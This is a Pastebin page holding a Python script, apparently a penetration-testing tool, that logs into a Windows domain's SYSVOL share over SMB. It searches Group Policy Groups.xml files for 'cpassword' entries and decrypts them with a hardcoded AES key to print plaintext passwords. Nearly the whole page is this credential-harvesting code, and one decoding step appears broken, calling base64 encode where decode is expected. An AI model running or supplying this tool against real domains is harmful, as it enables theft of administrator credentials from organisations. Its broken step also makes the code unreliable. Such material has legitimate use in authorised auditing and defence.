Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/python
- """
- This script allows for you to pull a password that is set by Group Policy out of the policy
- and decrypt it. This is based on the following blog post found by Ryan Elkins.
- http://esec-pentest.sogeti.com/exploiting-windows-2008-group-policy-preferences
- You need to have the following Python Packages installed that are not normally included.
- smbclient - http://pypi.python.org/pypi/PySmbClient/0.1.1
- Crypto - https://www.dlitz.net/software/pycrypto/ (This is already installed on Back|Track)
- Proper usage: python ./gp_password.py <Server> <Username> <Password> <Domain>
- Josh Kelley - 06/19/2012 @winfang98
- """
- import smbclient, sys, base64, binascii, re
- from Crypto.Cipher import AES
- def asciirepl(match):
- # replace the hexadecimal characters with ascii characters
- s = match.group()
- return binascii.unhexlify(s)
- def reformat_content(data):
- p = re.compile(r'\\x(\w{2})')
- return p.sub(asciirepl, data)
- if len(sys.argv) != 5:
- print "Proper usage: python ./gp_password.py <Server> <Username> <Password> <Domain>"
- exit()
- server = sys.argv[1]
- username = sys.argv[2]
- password = sys.argv[3]
- domain = sys.argv[4] # Not needed if logging onto the domain controller
- smb = smbclient.SambaClient(server=server, share="SYSVOL", username=username, password=password, domain=domain)
- key = """4e 99 06 e8 fc b6 6c c9 fa f4 93 10 62 0f fe e8
- f4 96 e8 06 cc 05 79 90 20 9b 09 a4 33 b6 6c 1b
- """.replace(" ","").replace("\n","").decode('hex')
- print "[-] Looking for Groups.xml file"
- try:
- first_dir = smb.listdir("/")
- except:
- print "[!] Cannont login to the server"
- exit()
- path = "/" + first_dir[0] + "/Policies/"
- for policy in smb.listdir(path):
- subpolicy = path + policy + "/MACHINE/Preferences/Groups/"
- try:
- for contents in smb.listdir(subpolicy):
- if contents == "Groups.xml":
- file_name = subpolicy + contents
- print "[-] Found Policy:", file_name
- f = smb.open(file_name)
- data = f.read()
- s = data.split(" ")
- for a in s:
- if a[:10] == "cpassword=":
- p = a.split("=")
- cpassword = p[1].strip('"') + "="
- o = AES.new(key, 2).decrypt(base64.b64encode(cpassword))
- ascii_string = reformat_content(o)
- print "[-] Password:", ascii_string
- except:
- pass
Add Comment
Please, Sign In to add comment